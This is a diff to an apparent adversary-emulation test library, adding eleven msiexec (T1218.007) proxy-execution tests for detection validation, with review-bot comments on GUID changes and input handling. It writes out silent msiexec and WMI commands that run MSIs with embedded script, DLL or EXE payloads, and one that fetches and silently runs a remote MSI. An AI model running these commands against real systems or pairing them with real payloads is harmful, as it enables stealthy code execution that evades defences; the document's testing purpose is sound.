diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 6936a1fc..1d8c5887 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -526,9 +526,17 @@ defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with
defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
-defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
-defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
-defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
+defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
+defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
+defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
+defense-evasion,T1218.007,Msiexec,4,Msiexec.exe - Execute Local MSI file with an embedded EXE,ed3fa08a-ca18-4009-973e-03d13014d0e8,command_prompt
+defense-evasion,T1218.007,Msiexec,5,WMI Win32_Product Class - Execute Local MSI file with embedded JScript,882082f0-27c6-4eec-a43c-9aa80bccdb30,powershell
+defense-evasion,T1218.007,Msiexec,6,WMI Win32_Product Class - Execute Local MSI file with embedded VBScript,cf470d9a-58e7-43e5-b0d2-805dffc05576,powershell
+defense-evasion,T1218.007,Msiexec,7,WMI Win32_Product Class - Execute Local MSI file with an embedded DLL,32eb3861-30da-4993-897a-42737152f5f8,powershell
+defense-evasion,T1218.007,Msiexec,8,WMI Win32_Product Class - Execute Local MSI file with an embedded EXE,55080eb0-49ae-4f55-a440-4167b7974f79,powershell
+defense-evasion,T1218.007,Msiexec,9,Msiexec.exe - Execute the DllRegisterServer function of a DLL,0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d,command_prompt
+defense-evasion,T1218.007,Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
+defense-evasion,T1218.007,Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
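Review bot: The T1218.007 rows retire all three existing GUIDs, including the one for the test whose name is unchanged: "Msiexec.exe - Execute Remote MSI file" moves from test 2 (bde7d2fe-d049-458d-a362-abda32a7e649) to test 11 (44a4bedf-ffe3-452e-bee4-6925ab125662). Detection-validation results, schedules or coverage maps keyed on the old GUID or test number lose continuity with earlier runs. Consider keeping the original GUID for the remote test and appending the new tests after the existing ones, or state the break explicitly in the commit message.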
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 5bcd62d6..07265b92 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -353,9 +353,17 @@ defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with
defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
-defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
-defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
-defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
+defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
+defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
+defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
+defense-evasion,T1218.007,Msiexec,4,Msiexec.exe - Execute Local MSI file with an embedded EXE,ed3fa08a-ca18-4009-973e-03d13014d0e8,command_prompt
+defense-evasion,T1218.007,Msiexec,5,WMI Win32_Product Class - Execute Local MSI file with embedded JScript,882082f0-27c6-4eec-a43c-9aa80bccdb30,powershell
+defense-evasion,T1218.007,Msiexec,6,WMI Win32_Product Class - Execute Local MSI file with embedded VBScript,cf470d9a-58e7-43e5-b0d2-805dffc05576,powershell
+defense-evasion,T1218.007,Msiexec,7,WMI Win32_Product Class - Execute Local MSI file with an embedded DLL,32eb3861-30da-4993-897a-42737152f5f8,powershell
+defense-evasion,T1218.007,Msiexec,8,WMI Win32_Product Class - Execute Local MSI file with an embedded EXE,55080eb0-49ae-4f55-a440-4167b7974f79,powershell
+defense-evasion,T1218.007,Msiexec,9,Msiexec.exe - Execute the DllRegisterServer function of a DLL,0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d,command_prompt
+defense-evasion,T1218.007,Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
+defense-evasion,T1218.007,Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 7d9cddcf..808b13a8 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -812,9 +812,17 @@
- Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
- Atomic Test #10: Mshta used to Execute PowerShell [windows]
- [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
- - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
- - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
- - Atomic Test #3: Msiexec.exe - Execute Arbitrary DLL [windows]
+ - Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
+ - Atomic Test #2: Msiexec.exe - Execute Local MSI file with embedded VBScript [windows]
+ - Atomic Test #3: Msiexec.exe - Execute Local MSI file with an embedded DLL [windows]
+ - Atomic Test #4: Msiexec.exe - Execute Local MSI file with an embedded EXE [windows]
+ - Atomic Test #5: WMI Win32_Product Class - Execute Local MSI file with embedded JScript [windows]
+ - Atomic Test #6: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript [windows]
+ - Atomic Test #7: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL [windows]
+ - Atomic Test #8: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE [windows]
+ - Atomic Test #9: Msiexec.exe - Execute the DllRegisterServer function of a DLL [windows]
+ - Atomic Test #10: Msiexec.exe - Execute the DllUnregisterServer function of a DLL [windows]
+ - Atomic Test #11: Msiexec.exe - Execute Remote MSI file [windows]
- [T1564.004 NTFS File Attributes](../../T1564.004/T1564.004.md)
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index c9d402d4..e79b7716 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -574,9 +574,17 @@
- Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
- Atomic Test #10: Mshta used to Execute PowerShell [windows]
- [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
- - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
- - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
- - Atomic Test #3: Msiexec.exe - Execute Arbitrary DLL [windows]
+ - Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
+ - Atomic Test #2: Msiexec.exe - Execute Local MSI file with embedded VBScript [windows]
+ - Atomic Test #3: Msiexec.exe - Execute Local MSI file with an embedded DLL [windows]
+ - Atomic Test #4: Msiexec.exe - Execute Local MSI file with an embedded EXE [windows]
+ - Atomic Test #5: WMI Win32_Product Class - Execute Local MSI file with embedded JScript [windows]
+ - Atomic Test #6: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript [windows]
+ - Atomic Test #7: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL [windows]
+ - Atomic Test #8: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE [windows]
+ - Atomic Test #9: Msiexec.exe - Execute the DllRegisterServer function of a DLL [windows]
+ - Atomic Test #10: Msiexec.exe - Execute the DllUnregisterServer function of a DLL [windows]
+ - Atomic Test #11: Msiexec.exe - Execute Remote MSI file [windows]
- [T1564.004 NTFS File Attributes](../../T1564.004/T1564.004.md)
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 6754d5c2..9e1f458e 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -33879,10 +33879,9 @@ defense-evasion:
source_name: Microsoft AlwaysInstallElevated 2018
identifier: T1218.007
atomic_tests:
- - name: Msiexec.exe - Execute Local MSI file
- auto_generated_guid: '0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8'
- description: 'Execute arbitrary MSI file. Commonly seen in application installation.
- The MSI opens notepad.exe when sucessfully executed.
+ - name: Msiexec.exe - Execute Local MSI file with embedded JScript
+ auto_generated_guid: a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04
+ description: 'Executes an MSI containing embedded JScript code using msiexec.exe
'
supported_platforms:
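Review bot: The replacement description ("Executes an MSI containing embedded JScript code using msiexec.exe") no longer says what happens on success, where the removed text named the process the MSI opens. Add the expected outcome of the embedded JScript, as the remote test's description does with "launches powershell.exe", so whoever runs the test knows which child process or event confirms it executed.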
@@ -33891,10 +33890,18 @@ defense-evasion:
msi_payload:
description: MSI file to execute
type: Path
- default: PathToAtomicsFolder\T1218.007\src\Win32\T1218.msi
+ default: PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi
+ action:
+ description: 'Specifies the MSI action to perform: i (install), a (admin),
+ j (advertise). The included MSI is designed to support all three action
+ types.
+
+'
+ type: String
+ default: i
dependency_executor_name: powershell
dependencies:
- - description: 'T1218.msi must exist on disk at specified location (#{msi_payload})
+ - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
'
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
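Review bot: `action` is typed as a free-form String although its description allows only i, a and j, and the value is substituted straight into the switch position of `msiexec.exe /q /#{action} "#{msi_payload}"`. A value such as y or z would select the DLL registration switches that tests 9 and 10 use and run a different technique under this test's GUID. Either check the value in the prereq step or state in the description that only the three listed letters are supported.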
@@ -33904,15 +33911,332 @@ defense-evasion:
'
executor:
- command: 'msiexec.exe /q /i "#{msi_payload}"
+ command: 'msiexec.exe /q /#{action} "#{msi_payload}"
+
+'
+ name: command_prompt
+ - name: Msiexec.exe - Execute Local MSI file with embedded VBScript
+ auto_generated_guid: 8d73c7b0-c2b1-4ac1-881a-4aa644f76064
+ description: 'Executes an MSI containing embedded VBScript code using msiexec.exe
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi
+ action:
+ description: 'Specifies the MSI action to perform: i (install), a (admin),
+ j (advertise). The included MSI is designed to support all three action
+ types.
+
+'
+ type: String
+ default: i
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+ prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'msiexec.exe /q /#{action} "#{msi_payload}"
+
+'
+ name: command_prompt
+ - name: Msiexec.exe - Execute Local MSI file with an embedded DLL
+ auto_generated_guid: 628fa796-76c5-44c3-93aa-b9d8214fd568
+ description: 'Executes an MSI containing an embedded DLL using msiexec.exe
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi
+ action:
+ description: 'Specifies the MSI action to perform: i (install), a (admin),
+ j (advertise). The included MSI is designed to support all three action
+ types.
+
+'
+ type: String
+ default: i
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+ prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'msiexec.exe /q /#{action} "#{msi_payload}"
+
+'
+ name: command_prompt
+ - name: Msiexec.exe - Execute Local MSI file with an embedded EXE
+ auto_generated_guid: ed3fa08a-ca18-4009-973e-03d13014d0e8
+ description: 'Executes an MSI containing an embedded EXE using msiexec.exe
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi
+ action:
+ description: 'Specifies the MSI action to perform: i (install), a (admin),
+ j (advertise). The included MSI is designed to support all three action
+ types.
+
+'
+ type: String
+ default: i
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+ prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'msiexec.exe /q /#{action} "#{msi_payload}"
+
+'
+ name: command_prompt
+ - name: WMI Win32_Product Class - Execute Local MSI file with embedded JScript
+ auto_generated_guid: 882082f0-27c6-4eec-a43c-9aa80bccdb30
+ description: 'Executes an MSI containing embedded JScript code using the WMI
+ Win32_Product class
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi
+ action:
+ description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
+ The included MSI is designed to support all three action types.
+
+'
+ type: String
+ default: Install
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+ prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
+ -Arguments @{ PackageLocation = ''#{msi_payload}'' }
+
+'
+ name: powershell
+ - name: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript
+ auto_generated_guid: cf470d9a-58e7-43e5-b0d2-805dffc05576
+ description: 'Executes an MSI containing embedded VBScript code using the WMI
+ Win32_Product class
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi
+ action:
+ description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
+ The included MSI is designed to support all three action types.
+
+'
+ type: String
+ default: Install
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+ prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
+ -Arguments @{ PackageLocation = ''#{msi_payload}'' }
+
+'
+ name: powershell
+ - name: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL
+ auto_generated_guid: 32eb3861-30da-4993-897a-42737152f5f8
+ description: 'Executes an MSI containing an embedded DLL using the WMI Win32_Product
+ class
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi
+ action:
+ description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
+ The included MSI is designed to support all three action types.
+
+'
+ type: String
+ default: Install
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+ prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
+ -Arguments @{ PackageLocation = ''#{msi_payload}'' }
+
+'
+ name: powershell
+ - name: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE
+ auto_generated_guid: 55080eb0-49ae-4f55-a440-4167b7974f79
+ description: 'Executes an MSI containing an embedded EXE using the WMI Win32_Product
+ class
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi
+ action:
+ description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
+ The included MSI is designed to support all three action types.
+
+'
+ type: String
+ default: Install
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+ prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
+ -Arguments @{ PackageLocation = ''#{msi_payload}'' }
+
+'
+ name: powershell
+ - name: Msiexec.exe - Execute the DllRegisterServer function of a DLL
+ auto_generated_guid: 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d
+ description: 'Loads a DLL into msiexec.exe and calls its DllRegisterServer function.
+ Note: the DLL included in the "src" folder is only built for 64-bit, so this
+ won''t work on a 32-bit OS.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ dll_payload:
+ description: DLL to execute that has an implemented DllRegisterServer function
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The DLL must exist on disk at specified location (#{dll_payload})
+
+'
+ prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'msiexec.exe /y "#{dll_payload}"
+
+'
+ name: command_prompt
+ - name: Msiexec.exe - Execute the DllUnregisterServer function of a DLL
+ auto_generated_guid: ab09ec85-4955-4f9c-b8e0-6851baf4d47f
+ description: 'Loads a DLL into msiexec.exe and calls its DllUnregisterServer
+ function. Note: the DLL included in the "src" folder is only built for 64-bit,
+ so this won''t work on a 32-bit OS.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ dll_payload:
+ description: DLL to execute that has an implemented DllUnregisterServer
+ function
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The DLL must exist on disk at specified location (#{dll_payload})
+
+'
+ prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'msiexec.exe /z "#{dll_payload}"
'
name: command_prompt
- name: Msiexec.exe - Execute Remote MSI file
- auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649
+ auto_generated_guid: 44a4bedf-ffe3-452e-bee4-6925ab125662
description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
- in application installation, commonly seen in malware execution. The MSI opens
- notepad.exe when sucessfully executed.
+ in application installation, commonly seen in malware execution. The MSI executes
+ a built-in JScript payload that launches powershell.exe.
'
supported_platforms:
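Review bot: In the two DLL tests (DllRegisterServer and DllUnregisterServer) the dependency is `dll_payload`, but `get_prereq_command` still prints "You must provide your own MSI", which looks copied from the MSI tests; it should refer to the DLL. The same message also sits oddly next to the MSI tests' `action` description, which calls the payload "the included MSI". Separately, every added `prereq_command` passes `#{msi_payload}` or `#{dll_payload}` to Test-Path unquoted while the executor quotes it, so an atomics folder path containing a space fails the prerequisite check even though the command itself would run.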
@@ -33921,39 +34245,10 @@ defense-evasion:
msi_payload:
description: MSI file to execute
type: String
- default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/Win32/T1218.msi
+ default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi
executor:
command: 'msiexec.exe /q /i "#{msi_payload}"
-'
- name: command_prompt
- - name: Msiexec.exe - Execute Arbitrary DLL
- auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec
- description: |
- Execute arbitrary DLL file stored locally. Commonly seen in application installation.
- Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32 bit systems change the dll_payload argument to the Win32 folder.
- By default, if the src folder is not in place, it will download the 64 bit version.
- supported_platforms:
- - windows
- input_arguments:
- dll_payload:
- description: DLL to execute
- type: Path
- default: PathToAtomicsFolder\T1218.007\src\x64\T1218.dll
- dependency_executor_name: powershell
- dependencies:
- - description: 'T1218.dll must exist on disk at specified location (#{dll_payload})
-
-'
- prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-
-'
- get_prereq_command: |
- New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
- Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}"
- executor:
- command: 'msiexec.exe /y "#{dll_payload}"
-
'
name: command_prompt
T1564.004:
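Review bot: The new `msi_payload` default still resolves through `raw/master`, so the MSI that `msiexec.exe /q /i` downloads and runs silently is whatever that branch holds at run time, and the test cannot pass until T1218.007_JScript.msi exists on master. Pin the default to a commit or release tag, or record the expected file hash in the description so a runner can verify what was executed.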
diff --git a/atomics/T1218.007/T1218.007.md b/atomics/T1218.007/T1218.007.md
index 6af04be4..e5788f42 100644
--- a/atomics/T1218.007/T1218.007.md
+++ b/atomics/T1218.007/T1218.007.md
@@ -6,22 +6,38 @@ Adversaries may abuse msiexec.exe to launch local or network accessible MSI file
## Atomic Tests
-- [Atomic Test #1 - Msiexec.exe - Execute Local MSI file](#atomic-test-1---msiexecexe---execute-local-msi-file)
+- [Atomic Test #1 - Msiexec.exe - Execute Local MSI file with embedded JScript](#atomic-test-1---msiexecexe---execute-local-msi-file-with-embedded-jscript)
-- [Atomic Test #2 - Msiexec.exe - Execute Remote MSI file](#atomic-test-2---msiexecexe---execute-remote-msi-file)
+- [Atomic Test #2 - Msiexec.exe - Execute Local MSI file with embedded VBScript](#atomic-test-2---msiexecexe---execute-local-msi-file-with-embedded-vbscript)
-- [Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL](#atomic-test-3---msiexecexe---execute-arbitrary-dll)
+- [Atomic Test #3 - Msiexec.exe - Execute Local MSI file with an embedded DLL](#atomic-test-3---msiexecexe---execute-local-msi-file-with-an-embedded-dll)
+
+- [Atomic Test #4 - Msiexec.exe - Execute Local MSI file with an embedded EXE](#atomic-test-4---msiexecexe---execute-local-msi-file-with-an-embedded-exe)
+
+- [Atomic Test #5 - WMI Win32_Product Class - Execute Local MSI file with embedded JScript](#atomic-test-5---wmi-win32_product-class---execute-local-msi-file-with-embedded-jscript)
+
+- [Atomic Test #6 - WMI Win32_Product Class - Execute Local MSI file with embedded VBScript](#atomic-test-6---wmi-win32_product-class---execute-local-msi-file-with-embedded-vbscript)
+
+- [Atomic Test #7 - WMI Win32_Product Class - Execute Local MSI file with an embedded DLL](#atomic-test-7---wmi-win32_product-class---execute-local-msi-file-with-an-embedded-dll)
+
+- [Atomic Test #8 - WMI Win32_Product Class - Execute Local MSI file with an embedded EXE](#atomic-test-8---wmi-win32_product-class---execute-local-msi-file-with-an-embedded-exe)
+
+- [Atomic Test #9 - Msiexec.exe - Execute the DllRegisterServer function of a DLL](#atomic-test-9---msiexecexe---execute-the-dllregisterserver-function-of-a-dll)
+
+- [Atomic Test #10 - Msiexec.exe - Execute the DllUnregisterServer function of a DLL](#atomic-test-10---msiexecexe---execute-the-dllunregisterserver-function-of-a-dll)
+
+- [Atomic Test #11 - Msiexec.exe - Execute Remote MSI file](#atomic-test-11---msiexecexe---execute-remote-msi-file)
-## Atomic Test #1 - Msiexec.exe - Execute Local MSI file
-Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed.
+## Atomic Test #1 - Msiexec.exe - Execute Local MSI file with embedded JScript
+Executes an MSI containing embedded JScript code using msiexec.exe
**Supported Platforms:** Windows
-**auto_generated_guid:** 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8
+**auto_generated_guid:** a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04
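Review bot: Renaming and renumbering the headings changes their generated anchors: `#atomic-test-2---msiexecexe---execute-remote-msi-file` becomes `#atomic-test-11---msiexecexe---execute-remote-msi-file`, and `#atomic-test-3---msiexecexe---execute-arbitrary-dll` disappears. Deep links from runbooks or detection notes into this page will land on the wrong test or nowhere, so it is worth listing the old-to-new mapping in the pull request description.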
@@ -30,21 +46,22 @@ Execute arbitrary MSI file. Commonly seen in application installation. The MSI o
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\Win32\T1218.msi|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi|
+| action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i|
#### Attack Commands: Run with `command_prompt`!
```cmd
-msiexec.exe /q /i "#{msi_payload}"
+msiexec.exe /q /#{action} "#{msi_payload}"
```
#### Dependencies: Run with `powershell`!
-##### Description: T1218.msi must exist on disk at specified location (#{msi_payload})
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
##### Check Prereq Commands:
```powershell
if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
@@ -60,13 +77,13 @@ Write-Host "You must provide your own MSI"
-## Atomic Test #2 - Msiexec.exe - Execute Remote MSI file
-Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed.
+## Atomic Test #2 - Msiexec.exe - Execute Local MSI file with embedded VBScript
+Executes an MSI containing embedded VBScript code using msiexec.exe
**Supported Platforms:** Windows
-**auto_generated_guid:** bde7d2fe-d049-458d-a362-abda32a7e649
+**auto_generated_guid:** 8d73c7b0-c2b1-4ac1-881a-4aa644f76064
@@ -75,7 +92,419 @@ Execute arbitrary MSI file retrieved remotely. Less commonly seen in application
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/Win32/T1218.msi|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi|
+| action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
